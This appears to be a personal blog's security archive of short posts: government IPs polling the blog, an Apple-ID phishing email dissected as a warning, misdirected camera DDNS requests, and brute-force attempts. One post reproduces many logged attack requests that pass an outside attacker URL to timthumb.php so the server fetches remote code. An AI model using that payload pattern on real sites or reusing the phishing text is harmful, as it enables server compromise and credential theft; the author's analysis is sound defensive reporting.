Category Archives: Computer Security
¡Bienvenidos, ineptos del Ministerio de Defensa!
Posted by Javi Lavandeira in Catalonia,Computer Security,Personal,Politics,Stupidity | April 24, 2019Hace mucho que no escribo en mi blog porque últimamente estoy mucho más activo por Twitter, pero es que esto me ha hecho mucha gracia.
Resulta que mirando los logs me he dado cuenta de que hay tres direcciones IP que por algún motivo están haciendo peticiones a este blog aproximadamente cada 30 segundos (olvidándonos por ahora de los típicos ataques automatizados que llegan hora sí, hora también). Son pe
ticiones como estas:
Las tres IPs que se repiten en el log son estas tres:
194.179.118.78 213.99.31.12 217.124.174.7
Lo gracioso es que estas tres IPs pertenecen a la Oficina Técnica de Seguridad Industrial del Ministerio de Defensa, dos en Madrid y una en Granada:
Por mi parte, orgullosísimo de que los imbéciles del Ministerio de Defensa consideren mi blog personal como un asunto de seguridad nacional.
:-p
The ioscareteam phishing email
Posted by Javi Lavandeira in Apple,Computer Security,Crime,Internet,Privacy | September 19, 2014I just got this very official-looking mail in my main address:
It reads like this:
Dear javi@lavandeira.net, (19 – September – 2014)
This message is to therefore warn you that your iCloud and Apple Account (javi@lavandeira.net) has been temporarily locked until we can validate your Apple Account details. This protective measure to secure your iCloud Account from unapproved usage. We apologise for any inconvenience you’ve been caused.
You will be unable to use iTunes or iCloud sync/backup or the iTunes/App Store & App Store until you verify your Apple Account ownership, we urge you to finish verification as soon as you can. Failure to validate your details within a 48 hours can cause termination of your Apple/iCloud ID to safeguard our system.
How to verify my Apple ID and restore access?
Just proceed to the link underneath to prove ownership of your Apple ID. Log-in in using your Appe/iCloud ID and password, then read the instructions.> Certify My Apple Account
While using Apple devices and services, you’ll still sign in with your main email address as your Apple ID.
If you have questions and need help, visit the Apple Account Care site.
Thanks again,
Apple Account Maintenance TeamCase Support ID: #Y10FHK10419-EU10
It sounds very scary and serious. Should I click the link and log in with my Apple ID and password?
No.
This is just another phishing attempt. You are likely to receive a similar email. Do not, under any circumstances, click on the link and enter your details. I repeat: it’s just another phishing attempt.
Looking a bit closer we can see that the message’s reply-to header points to an address in the ioscareteam.co.uk domain. This domain doesn’t belong to Apple:
The link in the body of the message also points to the same domain. Just place the mouse pointer over the link (without clicking) and wait a couple seconds:
Clicking the link would take you to a very convincing fake Apple site that copies Apple’s real site. Looks like they even copied the country/language selection code.
However, this fake site will send your login details to the idiots who are trying to scam you:
Summary: if you get an email like the one I got, ignore it.
Security problem in web cameras sold by CNB Technology
Posted by Javi Lavandeira in Computer Security,Internet | May 10, 2013A few days ago I noticed that I was receiving weird HTTP requests on my frontend web server. The requests were addressed to a domain that doesn’t exists in any of my servers, so initially I thought it was some kind of attack. Out of curiosity I decided to investigate a bit, and it turned out to be something way more interesting.
The requests looked like this:
61.125.xxx.xxx - - [05/May/2013:00:33:38 +0900] "POST http://autoipset.com/ddns/UpdateHost.php HTTP/1.0" 200 3 "-" "-" 61.125.xxx.xxx - - [05/May/2013:00:43:38 +0900] "POST http://autoipset.com/ddns/UpdateHost.php HTTP/1.0" 200 3 "-" "-" 122.19.xxx.xxx - - [05/May/2013:00:45:46 +0900] "POST http://autoipset.com/ddns/RegisterHost.php HTTP/1.0" 200 3 "-" "-" 180.31.xxx.xxx - - [05/May/2013:00:47:53 +0900] "POST http://autoipset.com/ddns/RegisterHost.php HTTP/1.0" 200 3 "-" "-" 114.166.xxx.xxx - - [05/May/2013:00:54:57 +0900] "POST http://autoipset.com/ddns/UpdateHost.php HTTP/1.0" 200 3 "-" "-" 61.125.xxx.xxx - - [05/May/2013:02:03:48 +0900] "POST http://autoipset.com/ddns/UpdateHost.php HTTP/1.0" 200 3 "-" "-" 180.31.xxx.xxx - - [05/May/2013:02:13:05 +0900] "POST http://autoipset.com/ddns/UpdateHost.php HTTP/1.0" 200 3 "-" "-"
(These logs show an HTTP status code of 200 instead of 404 because this is after changing some things on my server. Keep reading for details.)
In other words, several machines from a bunch of different dynamic IP addresses were sending data via HTTP POST to a couple of PHP scripts (/ddns/UpdateHost.php and /ddns/RegisterHost.php) in the autoipset.com domain.
What puzzled me is that autoipset.com is not, and has never been, hosted in any of my servers.
Keep reading to see the rest of the story…
Read more ›Another script kiddy bruteforcing my password
Posted by Javi Lavandeira in Computer Security,Crime,Stupidity | May 2, 2013Just as I finished the previous post, this pops up in my Varnish log:
A script kiddy using a host in Italy to bruteforce my WordPress password. What a waste of time and bandwidth.
My friend, please try something more sophisticated. I’m sure there are some holes on my system somewhere just waiting to be exploited.
One of today’s attacks to this web server
Posted by Javi Lavandeira in Computer Security,Crime,Technology | April 29, 2013My web server was attacked by some guy in Germany last night. This is happens several times a day, so it’s usually not a concern. Ths time it happened while I was monitoring the server, so I had some fun looking at what the attacker was trying to do.
When I’m working on the computer at home I usually have a terminal window open in the background. In this window I’m usually watching all requests to my web server in real time. Most of time time I don’t pay attention to it (it’s mostly search engines crawling my domains), but sometimes you catch something interesting. This is an example of the kind of attacks hitting every web server on the Internet many times a day.
I was having dinner when I saw several strange requests to the Varnish server in front of my backend web server:
85.214.110.68 - - [28/Apr/2013:22:47:48 +0900] "GET /wp-content/themes/Momento/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 400 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:47:49 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:47:50 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:47:54 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:47:55 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:47:56 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:47:57 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:47:58 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:47:59 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:00 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:01 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:07 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:08 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:09 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:10 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:11 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:12 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:18 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:19 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:20 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:21 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:22 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:23 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" 85.214.110.68 - - [28/Apr/2013:22:48:25 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]" [...additional lines ommited...]
(Actually, these logs are from the backend web server running Apache. I’m not storing the request log on the Varnish machine.)
This guy was obviously scanning the web server for a script called timthumb.php. A quick search on Google shows that there was indeed a security problem with older versions of this program. It was possible to trick it into downloading a file from an attacker’s host and saving it into the server, where it could be later executed in order to compromise the system (see this link for details.)
Read more ›ag0ny.com domain stolen
Posted by Javi Lavandeira in Computer Security,Crime,Internet,Personal | July 5, 2012I just realized now that ag0ny.com, the domain name that I had been using for over 12 years, has been stolen. It’s pointing to a site in Russia and is hosting what appears to be a web aggregator.
I’m not really going to pursue this because the domain was worthless. I just had an email address there that I barely used. I kept it because from time to time some old friend or another sent me an email there. Plus, another person had an @ag0ny.com address on my server (JPGrobler: if you read this, now you know why your email address isn’t working anymore, I’m sorry).
So remember, if you want to contact me via email, my current email address is javi@lavandeira.net, not the old ag0ny@ag0ny.com.
ag0ny.com at the Internet Archive Wayback Machine, just for nostalgia.